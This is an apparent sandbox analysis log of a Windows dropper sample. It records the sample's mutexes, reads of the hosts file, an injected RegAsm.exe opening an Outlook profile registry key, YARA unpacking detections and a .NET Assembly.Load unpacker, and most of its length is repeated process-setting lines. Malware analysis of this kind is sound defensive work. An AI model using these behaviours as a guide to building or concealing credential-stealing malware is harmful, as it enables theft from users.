                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5096:120:WilError_01
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5700:120:WilError_01
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\OutlookJump to behavior
                Source: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                Data Obfuscation

                barindex
                Yara detected aPLib compressed binary
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.4291b00.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.42b9b20.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.42b9b20.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.4291b00.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.528024280.00000000042B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.521045812.0000000003211000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000000.513552356.0000000000415000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.527878465.0000000004291000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe PID: 5092, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2084, type: MEMORYSTR
                .NET source code contains potential unpacker
                Source: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe, u0005.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 0.0.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.d60000.0.unpack, u0005.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_0493C710 push es; ret 1_2_0493C720
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_0493ACC0 push es; ret 1_2_0493ACD0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_0493CA10 push es; ret 1_2_0493CA20
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_0493B504 push E801005Eh; ret 1_2_0493B509
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
